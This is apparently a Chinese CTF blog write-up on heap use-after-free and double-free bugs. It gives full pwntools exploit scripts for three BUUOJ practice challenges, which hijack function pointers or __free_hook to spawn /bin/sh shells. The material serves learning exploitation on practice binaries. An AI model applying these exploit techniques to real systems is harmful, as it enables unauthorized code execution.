uaf和double free

前言

最近开始打算入门堆,简单记录几道相关的题。

hitcontraining-uaf

题目较为简单,存在后门函数 magic。从 exp 看,note 结构体(函数指针 + 内容指针,共 8 字节)在 free 之后指针并未清空(UAF):先申请并释放两个 note,再申请一个内容大小为 8 的 note,其内容块会从 fastbin 拿到旧 note 0 的结构体,把 magic 的地址写进去就覆盖了它的函数指针,最后 show(0) 触发调用即可。

exp

from pwn import *
local_file = './hacknote'
local_libc = '/lib/x86_64-linux-gnu/libc.so.6'
# For a real remote run this should point at the target's libc (e.g. '../libc.so.6');
# as written the "remote" libc is just the local one.
remote_libc = local_libc
debug = 0  # 0 -> talk to the remote target, non-zero -> spawn a local process
if debug:
    io = process(local_file)
else:
    io = remote('node3.buuoj.cn', 27892)
libc = ELF(local_libc if debug else remote_libc)

elf = ELF(local_file)
# This rebinding throws away the ELF(local_libc / remote_libc) loaded above and
# uses whatever libc the local loader maps for the binary. Nothing in this
# exploit reads libc (the backdoor lives inside the binary), so that is harmless here.
libc = elf.libc
context.update(
    log_level='debug',
    arch=elf.arch,
    terminal=['tmux', 'splitw', '-h'],  # or 'neww' for a new tmux window
)

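# Short aliases around the tube so the exploit body reads like a transcript.
s = lambda data: io.send(data)
sa = lambda delim, data: io.sendafter(delim, data)
sl = lambda data: io.sendline(data)
sla = lambda delim, data: io.sendlineafter(delim, data)
sea = lambda delim, data: io.sendafter(delim, data)  # kept for callers: same as sa
r = lambda numb=4096: io.recv(numb)
ru = lambda delims, drop=True: io.recvuntil(delims, drop)
# Zero-extend a short little-endian leak to a full word before unpacking.
# Pad with b'\0', not '\0': io.recv() returns bytes on Python 3 and
# bytes.ljust() rejects a str fill character (on Python 2 the two are identical).
uu32 = lambda data: u32(data.ljust(4, b'\0'))
uu64 = lambda data: u64(data.ljust(8, b'\0'))
info_addr = lambda tag, addr: io.info(tag + ': {:#x}'.format(addr))
itr = lambda: io.interactive()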
def dbg():
    """Attach gdb to the live tube and block until the operator resumes."""
    gdb.attach(io)
    pause()

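def add(size, content):
    """Menu option 1: create a note whose content buffer is `size` bytes long.

    `content` is sent as-is rather than through str(): on Python 3 a bytes
    payload built with p32()/p64() would otherwise become the literal text
    "b'...'" and the pointer overwrite would silently miss (on Python 2
    str(bytes) is a no-op, which is what the original relied on).
    """
    sl('1')
    ru('Note size ')
    sl(str(size))
    ru('Content :')
    sl(content)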

def dele(index):
    """Menu option 2: free note `index`.

    The program presumably leaves the dangling pointer in its note table,
    which is the use-after-free the exploit builds on.
    """
    for reply in ('2', str(index)):
        sl(reply)
def show(index):
    """Menu option 3: print note `index`, presumably through the note's own
    function pointer -- the call the exploit redirects to `magic`."""
    for reply in ('3', str(index)):
        sl(reply)
# Exploit sequence. Freeing both notes drops their 8-byte structs and 16-byte
# contents into the fastbins. The third add(8, ...) then (assuming the struct is
# allocated before its content, as hacknote does) takes note 1's old struct as
# its struct and note 0's old struct as its *content*, so the p32(magic) written
# there lands on note 0's function pointer and show(0) calls the backdoor.
prompt = 'Your choice :'
ru(prompt)
add(16, 'aaaa')  # note 0
ru(prompt)
add(16, 'bbbb')  # note 1
ru(prompt)
dele(0)
ru(prompt)
dele(1)
ru(prompt)
add(8, p32(elf.symbols['magic']))  # note 2: content buffer == note 0's struct
ru(prompt)
show(0)
itr()

ACTF_2019_babyheap

题目有 system 函数(直接用 plt 表项即可),ELF 里也自带 /bin/sh\x00 字符串(程序无 PIE,地址固定为 0x602010,可用 strings -t x 确认)。当时在构造 /bin/sh\x00 的字符串指针时费了一点劲,结果发现 ELF 本身就有这个字符串,然后就很简单了:仍然是 UAF,让新 note 的 16 字节内容落在旧 note 0 的结构体上,按结构体布局放好参数指针和 system@plt,show(0) 即触发 system("/bin/sh")。

exp

from pwn import *
local_file = './ACTF_2019_babyheap'
local_libc = '/lib/x86_64-linux-gnu/libc.so.6'
# For a real remote run this should point at the target's libc (e.g. '../libc.so.6');
# as written the "remote" libc is just the local one.
remote_libc = local_libc
debug = 1  # non-zero -> spawn a local process, 0 -> talk to the remote target
if debug:
    io = process(local_file)
else:
    io = remote('node3.buuoj.cn', 27341)
libc = ELF(local_libc if debug else remote_libc)

elf = ELF(local_file)
# This rebinding discards the ELF(local_libc / remote_libc) loaded above in
# favour of whatever libc the local loader maps for the binary. The exploit
# below only needs elf.plt['system'], so libc is never consulted here.
libc = elf.libc
context.update(
    log_level='debug',
    arch=elf.arch,
    terminal=['tmux', 'splitw', '-h'],  # or 'neww' for a new tmux window
)

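# Short aliases around the tube so the exploit body reads like a transcript.
s = lambda data: io.send(data)
sa = lambda delim, data: io.sendafter(delim, data)
sl = lambda data: io.sendline(data)
sla = lambda delim, data: io.sendlineafter(delim, data)
sea = lambda delim, data: io.sendafter(delim, data)  # kept for callers: same as sa
r = lambda numb=4096: io.recv(numb)
ru = lambda delims, drop=True: io.recvuntil(delims, drop)
# Zero-extend a short little-endian leak to a full word before unpacking.
# Pad with b'\0', not '\0': io.recv() returns bytes on Python 3 and
# bytes.ljust() rejects a str fill character (on Python 2 the two are identical).
uu32 = lambda data: u32(data.ljust(4, b'\0'))
uu64 = lambda data: u64(data.ljust(8, b'\0'))
info_addr = lambda tag, addr: io.info(tag + ': {:#x}'.format(addr))
itr = lambda: io.interactive()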
def dbg():
    """Attach gdb to the live tube and block until the operator resumes."""
    gdb.attach(io)
    pause()

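def add(size, content):
    """Menu option 1: create a note with a `size`-byte content buffer.

    `content` is sent as-is rather than through str(): on Python 3 a bytes
    payload built with flat()/p64() would otherwise become the literal text
    "b'...'" and the struct overwrite would silently miss (on Python 2
    str(bytes) is a no-op, which is what the original relied on). sa() sends
    exactly the bytes given, with no trailing newline.
    """
    sla('Your choice: ', '1')
    sla('size: \n', str(size))
    sa('content: \n', content)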
def dele(index):
    """Menu option 2: free note `index`.

    The program presumably keeps the dangling pointer in its note table,
    which is the use-after-free the exploit builds on.
    """
    for prompt, reply in ((': ', '2'), ('index: \n', str(index))):
        sla(prompt, reply)
def show(index):
    """Menu option 3: print note `index`, presumably via the note's own
    function pointer -- the call the exploit redirects to system@plt."""
    for prompt, reply in ((': ', '3'), ('index: \n', str(index))):
        sla(prompt, reply)

# Two notes, both freed: their (apparently 16-byte) note structs and 32-byte
# contents sit in the fastbins while the note table still points at them.
add(32, 'aaaaaaaa')  # note 0
add(32, 'bbbbbbbb')  # note 1
dele(0)
dele(1)
# '/bin/sh\x00' already lives in the binary; the address is usable as a constant
# only because the binary is not PIE -- confirm with `strings -t x` on another build.
binsh = 0x602010
# The 16-byte content allocation is expected to reuse note 0's freed struct.
# Laying it out as [binsh, system@plt] presumably matches a struct of
# {argument, function pointer}, so show(0) becomes system("/bin/sh"); check the
# struct layout in the disassembly if this does not pop a shell.
add(16, flat(binsh, elf.plt['system']))  # note 2
show(0)
itr()

actf-2019-message

Double free,借此把分配“迁移”到伪造的堆块(这里直接指向程序数据段里的 0x602068,应为 message 指针表);在 fastbin 下要注意伪造堆块的 size 字段必须与对应的 fastbin 大小一致,tcache 则不做这项检查。
把 __free_hook 改成 system 即可。free 时传给 __free_hook 的参数正好是堆块的 data 指针,内容完全可控,所以在块里放 /bin/sh 再 free 它就能拿到 shell。
(buu 给的复现环境是 Ubuntu 18(glibc 2.27),有 tcache 机制。本人当时还不太熟悉,只知道 tcache 不检查取出 chunk 的 size 是否对应,并且 2.27 也没有 double free 检测,所以 free(1)、free(2)、free(1) 可以直接过;注意 glibc 2.29 起 tcache 用 key 字段检测二次释放,这种连续的 double free 会直接 abort,需要先改掉 key 或者回到 fastbin 的老办法。本人是在 16 上做的,然后调试改了改脚本,打通了 buu 的复现环境。下面的 exp 也是 18 的。)

exp

from pwn import *
local_file = './ACTF_2019_message'
# The template's explicit libc loading (local '/lib/x86_64-linux-gnu/libc-2.27.so',
# remote '../libc.so.6') is disabled in this script; the libc offsets used later
# come from elf.libc instead, so for a remote run that must be the target's libc.
debug = 1  # non-zero -> spawn a local process, 0 -> talk to the remote target
io = process(local_file) if debug else remote('node3.buuoj.cn', 25390)

elf = ELF(local_file)
# Every libc offset below (puts, system, __free_hook) is read from this object,
# i.e. the libc the *local* loader maps for the binary. Against the remote target
# it has to be the target's own libc (glibc 2.27 on the buuoj Ubuntu 18 image),
# or the computed base and hook addresses will be wrong.
libc = elf.libc
context.update(
    log_level='debug',
    arch=elf.arch,
    terminal=['tmux', 'splitw', '-h'],  # or 'neww' for a new tmux window
)

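# Short aliases around the tube so the exploit body reads like a transcript.
s = lambda data: io.send(data)
sa = lambda delim, data: io.sendafter(delim, data)
sl = lambda data: io.sendline(data)
sla = lambda delim, data: io.sendlineafter(delim, data)
sea = lambda delim, data: io.sendafter(delim, data)  # kept for callers: same as sa
r = lambda numb=4096: io.recv(numb)
ru = lambda delims, drop=True: io.recvuntil(delims, drop)
# Zero-extend a short little-endian leak (the 6-byte puts address below) to a
# full word before unpacking. Pad with b'\0', not '\0': io.recv() returns bytes
# on Python 3 and bytes.ljust() rejects a str fill character (identical on Python 2).
uu32 = lambda data: u32(data.ljust(4, b'\0'))
uu64 = lambda data: u64(data.ljust(8, b'\0'))
info_addr = lambda tag, addr: io.info(tag + ': {:#x}'.format(addr))
itr = lambda: io.interactive()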
def dbg():
    """Attach gdb to the live tube and block until the operator resumes.

    Only meaningful when `io` is a local process; gdb cannot attach to the
    remote target.
    """
    gdb.attach(io)
    pause()

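def add(length, contend):
    """Menu option 1: allocate a message of `length` bytes and fill it with `contend`.

    `contend` is sent as-is rather than through str(): on Python 3 a bytes
    payload built with p64() would otherwise become the literal text "b'...'"
    and the tcache next-pointer overwrite would silently miss (on Python 2
    str(bytes) is a no-op, which is what the original relied on). sa() sends
    exactly the bytes given, with no trailing newline.
    """
    sla('choice: ', '1')
    sla('length of message:\n', str(length))
    sa('message:\n', contend)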
def free(index):
    """Menu option 2: delete message `index`.

    The program presumably keeps the stale pointer in its table after free(),
    which is what lets the script free the same index twice.
    """
    for prompt, reply in (('choice: ', '2'), ('to delete:\n', str(index))):
        sla(prompt, reply)
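def edit(index, contend):
    """Menu option 3: overwrite message `index` with `contend`.

    `contend` is sent as-is rather than through str(): on Python 3 a p64()
    payload would otherwise become the literal text "b'...'" and the write to
    __free_hook would be garbage (on Python 2 str(bytes) is a no-op, which is
    what the original relied on).
    """
    sla('choice: ', '3')
    sla('to edit:\n', str(index))
    sa('the message:\n', contend)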

def show(index):
    """Menu option 4: print message `index` (used for the puts@got leak)."""
    for prompt, reply in (('choice: ', '4'), ('to display:\n', str(index))):
        sla(prompt, reply)


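# --- stage 1: tcache double free -> an allocation on top of the message table ---
# glibc 2.27's tcache performs no double-free detection (the `key` check only
# arrived in 2.29), so free(1) twice leaves chunk 1 in the 0x30 tcache bin twice;
# the indices in the comments are the ones edit(6)/free(7) below rely on.
add(0x30, 'a')  # 0 - the slot later re-pointed at puts@got and __free_hook
add(0x20, 'a')  # 1
add(0x20, 'a')  # 2
free(1)
free(2)
free(1)          # bin is now 1 -> 2 -> 1

# 0x602068 is presumably inside the binary's message-pointer table (non-PIE);
# tcache does not validate the size field of the chunk it hands out, so no fake
# header needs to be built there.
fake = 0x602068
add(0x20, p64(fake))  # 3: chunk 1 again, its stored next pointer becomes `fake`
add(0x20, 'aaaaaaaa')  # 4: chunk 2
add(0x20, 'aaaaaaaa')  # 5: chunk 1, leaving `fake` at the head of the bin
add(0x20, p64(elf.got['puts']))  # 6: at 0x602068 -> slot 0 now points at puts@got

# --- stage 2: leak libc, then __free_hook -> system ---
show(0)
ru(' message: ')
puts = uu64(r(6))
# Offsets come from `libc` (elf.libc); for the remote target they must be taken
# from its libc, and __free_hook itself no longer exists from glibc 2.34 on.
libc_base = puts - libc.symbols['puts']
free_hook = libc_base + libc.symbols['__free_hook']
system = libc_base + libc.symbols['system']
info_addr('puts', puts)
info_addr('libc_base', libc_base)
if debug:
    # An unconditional dbg() would try to attach gdb to the remote tube and
    # break non-local runs; only attach when a local process is being driven.
    dbg()
edit(6, p64(free_hook))  # slot 0 -> __free_hook
edit(0, p64(system))     # *__free_hook = system
add(0x8, '/bin/sh\x00')  # 7: free()'s argument is the chunk's data pointer
free(7)                  # __free_hook(ptr) == system("/bin/sh")
itr()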



本博客所有文章除特别声明外,均采用 CC BY-SA 3.0协议 。转载请注明出处!